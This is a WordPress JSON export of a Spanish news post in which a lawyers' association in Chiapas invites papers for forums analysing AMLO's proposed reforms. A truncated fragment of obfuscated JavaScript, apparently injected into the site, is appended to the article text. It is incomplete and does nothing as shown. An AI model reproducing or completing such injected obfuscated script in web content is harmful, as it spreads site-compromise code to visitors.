{"id":14193,"date":"2024-02-16T05:03:28","date_gmt":"2024-02-16T05:03:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14193"},"modified":"2024-02-16T05:03:29","modified_gmt":"2024-02-16T05:03:29","slug":"anad-lanza-convocatoria-para-foros-de-analisis-de-las-iniciativas-propuestas-por-amlo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14193","title":{"rendered":"ANAD lanza convocatoria para foros de an\u00e1lisis de las iniciativas propuestas por AMLO"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708059742563-768x1024.jpg\" alt=\"\" class=\"wp-image-14194\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708059742563-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708059742563-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708059742563.jpg 780w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores15 de febrero del 2024. Tuxtla Guti\u00e9rrez.- En las \u00faltimas horas, el presidente del Comit\u00e9 Estatal en Chiapas de la Asociaci\u00f3n Nacional de Abogados Democr\u00e1ticos, Porfirio Guti\u00e9rrez Fiallo, convoca a las y los activistas defensores de derechos humanos, acad\u00e9micos, estudiantes, abogadas y abogados a participar en los foros de an\u00e1lisis que se llevar\u00e1n a cabo del 16 al 20 de marzo de 2024 en d\u00eda, hora y lugar pendiente de confirmarse. Las ponencias ser\u00e1n recibidas a trav\u00e9s de la cuenta oficial anadchiapasoficial2024@gmail.com a partir del d\u00eda de hoy 15 de febrero hasta el 15 de marzo de 2024 y, por ese mismo medio se har\u00e1n las indicaciones del d\u00eda, hora y lugar en que se realizar\u00e1n los eventos. Ante la pregunta de \u00bfqu\u00e9 opini\u00f3n le merece el paquete de Reformas propuestas por el presidente de M\u00e9xico?, el representante del comit\u00e9 estatal en Chiapas, Porfirio Guti\u00e9rrez Fiallo ha expresado que: \u201cUna reforma debe aspirar a mejorar progresivamente los derechos humanos y sociales y, la que no cumpla con estos requisitos es inconstitucional\u201d.Agreg\u00f3 que: \u201cPlat\u00f3n dec\u00eda que \u2018El precio de desentenderse de la pol\u00edtica es ser gobernado por los peores hombres\u2019 nosotros consideramos que desentendernos de cualquier reforma puede implicar una mala convivencia social\u201d, sentenci\u00f3.Expres\u00f3 que:  \u201cLas bases y formato de los art\u00edculos para presentar ponencias se encuentran en la convocatoria adjunta al bolet\u00edn y, b\u00e1sicamente, el fin es garantizar una estructura argumentativa telegr\u00e1fica, concisa y entendible; y no dar lugar a disertaciones que am\u00e9n de una cr\u00edtica ayunan por su parte de una lectura sincera de lo que se cuestiona\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores15 de febrero del 2024. Tuxtla Guti\u00e9rrez.- En las \u00faltimas horas, el presidente del Comit\u00e9 Estatal en Chiapas de la Asociaci\u00f3n Nacional de Abogados Democr\u00e1ticos, Porfirio Guti\u00e9rrez Fiallo, convoca a las y los activistas defensores de derechos humanos, acad\u00e9micos, estudiantes, abogadas y abogados a participar en los foros de an\u00e1lisis que se llevar\u00e1n a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14194,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-14193","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14193"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14193\/revisions"}],"predecessor-version":[{"id":14195,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14193\/revisions\/14195"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14194"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}